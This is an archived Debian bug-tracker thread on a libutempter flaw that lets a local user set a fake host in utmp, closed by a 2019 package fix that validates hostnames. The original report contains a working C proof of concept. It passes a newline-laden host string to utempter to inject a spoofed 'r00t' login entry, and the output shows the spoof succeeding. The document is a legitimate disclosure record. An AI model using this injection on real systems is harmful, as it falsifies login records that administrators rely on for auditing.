Bug#689562: marked as done (/usr/lib/utempter/utempter: Allows fake host setting)

To: Christian Göttsche <cgzones@googlemail.com>
Subject: Bug#689562: marked as done (/usr/lib/utempter/utempter: Allows fake host setting)
From: "Debian Bug Tracking System" <owner@bugs.debian.org>
Date: Wed, 02 Oct 2019 17:51:05 +0000
Message-id: <[🔎] handler.689562.D689562.15700385807948.ackdone@bugs.debian.org>
Reply-to: 689562@bugs.debian.org
References: <E1iFikr-000G7u-Lv@fasolo.debian.org> <20121004020216.28236.9336.reportbug@bari.maths.usyd.edu.au>

Your message dated Wed, 02 Oct 2019 17:49:37 +0000
with message-id <E1iFikr-000G7u-Lv@fasolo.debian.org>
and subject line Bug#689562: fixed in libutempter 1.1.6-4
has caused the Debian Bug report #689562,
regarding /usr/lib/utempter/utempter: Allows fake host setting
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact owner@bugs.debian.org
immediately.)


-- 
689562: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=689562
Debian Bug Tracking System
Contact owner@bugs.debian.org with problems

--- Begin Message ---

To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: /usr/lib/utempter/utempter: Allows fake host setting
From: Paul Szabo <paul.szabo@sydney.edu.au>
Date: Thu, 04 Oct 2012 12:02:16 +1000
Message-id: <20121004020216.28236.9336.reportbug@bari.maths.usyd.edu.au>

Package: libutempter0
Version: 1.1.5-3
Severity: normal
File: /usr/lib/utempter/utempter


Utempter does not (cannot?) verify the setting of host, so it can easily
be faked. This may affect any software that depend on utmp correctness.

Demo of the issue:

psz@bari:~$ cat silly.c
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
int main()
{
  int i;
  i = open("/dev/ptmx", O_RDWR);
  printf("open ptmx returned %d\n", i);
  dup2(i, 0);
  /* dup2(i, 1); */
  printf("doing utempter add\n");
  system("/usr/lib/utempter/utempter add 'xyz)\nr00t     pts/0        Jan  1 01:02 (xyz.com'");
  printf("checking who\n");
  system("who | grep xyz");
  printf("doing utempter del\n");
  system("/usr/lib/utempter/utempter del");
  printf("checking who\n");
  system("who | grep xyz");
  printf("DONE\n");
}
psz@bari:~$ cc silly.c; a.out
open ptmx returned 3
doing utempter add
checking who
psz      pts/29       Oct  4 11:48 (xyz)
r00t     pts/0        Jan  1 01:02 (xyz.com)
doing utempter del
checking who
DONE
psz@bari:~$ 

Please see also:
http://bugs.debian.org/329156
http://bugs.debian.org/330907

Cheers, Paul

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia


-- System Information:
Debian Release: 6.0.6
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 3.2.19-pk06.01-i386 (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages libutempter0 depends on:
ii  adduser                       3.112+nmu2 add and remove users and groups
ii  libc6                         2.11.3-4   Embedded GNU C Library: Shared lib

libutempter0 recommends no packages.

libutempter0 suggests no packages.

-- no debconf information

--- End Message ---

--- Begin Message ---

To: 689562-close@bugs.debian.org
Subject: Bug#689562: fixed in libutempter 1.1.6-4
From: Christian Göttsche <cgzones@googlemail.com>
Date: Wed, 02 Oct 2019 17:49:37 +0000
Message-id: <E1iFikr-000G7u-Lv@fasolo.debian.org>

Source: libutempter
Source-Version: 1.1.6-4

We believe that the bug you reported is fixed in the latest version of
libutempter, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 689562@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Christian Göttsche <cgzones@googlemail.com> (supplier of updated libutempter package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Mon, 30 Sep 2019 23:37:44 +0200
Source: libutempter
Architecture: source
Version: 1.1.6-4
Distribution: unstable
Urgency: medium
Maintainer: Christian Göttsche <cgzones@googlemail.com>
Changed-By: Christian Göttsche <cgzones@googlemail.com>
Closes: 689562 879388
Changes:
 libutempter (1.1.6-4) unstable; urgency=medium
 .
   * Set myself as new maintainer (Closes: #879388)
   * Update vcs fields accordingly
   * Bump to compat level 12
   * Bump to std version 4.4.1
   * Enable all hardening options in d/rules
   * Add autopkg testsuite
   * Convert d/copyright to machine-readable format
   * Add standard salsa-ci configuration, exclude reprotest for chown failures
   * Remove unneeded ignore file for list-missing
   * Explicit set Build-Depends-Package in d/libutempter0.symbols
   * Explicit set Rules-Requires-Root to binary-targets
   * Add C compiler -Wextra flag in d/rules
   * Patches:
     - Convert to gbp style
     - add: Mark old interfaces as deprecated
     - add: Validate given hostname (Closes: #689562)
Checksums-Sha1:
 708484b0d532e46861f9b954a331f6c23a4e1cda 2036 libutempter_1.1.6-4.dsc
 6612a8b0b27a97e72e60fa5953c5c016d12d3c68 10884 libutempter_1.1.6-4.debian.tar.xz
 cb52ad5baa5c5df737e5c04021ac92129b1dc2ad 5407 libutempter_1.1.6-4_source.buildinfo
Checksums-Sha256:
 3512c47b31fdfd8d3d7279ebfbea7074c9d2cb9e576239bc5d42590d20ccc4cb 2036 libutempter_1.1.6-4.dsc
 76effc9ccc45409233fc534b83b03ead05da904972c068fe4e704554aad3c4a8 10884 libutempter_1.1.6-4.debian.tar.xz
 af18c28ae7e7ef0db198345ee31d6757fe262d23db201b16174e914f51288556 5407 libutempter_1.1.6-4_source.buildinfo
Files:
 25be1d7dd834cd16bc8c4f3c101a3bbf 2036 libs optional libutempter_1.1.6-4.dsc
 433e171ea229d19aa95abb9bd095c937 10884 libs optional libutempter_1.1.6-4.debian.tar.xz
 cbfa3426d7fe5b37ba3ef5691a52bb94 5407 libs optional libutempter_1.1.6-4_source.buildinfo

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEkjZVexcMh/iCHArDweDZLphvfH4FAl2U3fAACgkQweDZLphv
fH7FExAAiDUx5HYU9H9yBp8afEQLEE6R45taTLfIs+FtGU61dW0VvIobmgDn65dI
RX0nBF+YQ5kOFFKp1wURgklm45t+K916J3xwc6hT4EJuEUEOtAPv65VlPNR1fYYE
iXLvCAmsphqP40kfrykzYIPORiPgqlwwXgFGMGuL4hOeCkdrrGZLXdYANLoeX7p0
CDmoLFAKnY4/p8ZHSDQH5vK+MCA/LznJ9Bz039HZ2x/Q+91u+YJ6AC9SF92D4LQV
OeWxThKpyk8e4fGEzSlZ/AT1xnBbKMXmg58ZPb+2OYYCcQmVQoXzL+/IdxpfDDTP
A5O/iRA0sJF5RjI0HLdHgtZ2O2nRIWJtYrOWbPm83kxmJ6xVQAZNIuCRuR5oAACb
JZFmxvuapzz8jZtIY+4A2qCm7EdngPjTMc/lQMFgagBa6AI8Rl62skzHsvVrtD5e
0LPGlO/qmAbN1MLIK3/kerqKdSN0+/Ny7iOtTDB3uj0CTCYc3HDr3tPQGG3evZym
NYOZEl17awhsVb28mRnM3rpcRbkNLdIYOjEt0keSQFvPpOUQTMa9hiW/9VEbRPDQ
CUXn68eSMZSgugZoNlx1WkHCIktbcet7w6/PVDlLM4kIf0lc+Bn37wlGQaPstcEw
4yiQ3atD8JMxotk+Y0bsG+w2TBtpWnW3Tx6/Ki1RGslHx9kp2Jg=
=InJ2
-----END PGP SIGNATURE-----

--- End Message ---

Reply to:

Prev by Date: Bug#941600: kio leads to a crash of kinit (SIGSEGV)
Next by Date: Request for fix for #934185 to be applied to Buster
Previous by thread: Bug#941600: marked as done (kio leads to a crash of kinit (SIGSEGV))
Next by thread: Request for fix for #934185 to be applied to Buster
Index(es):
- Date
- Thread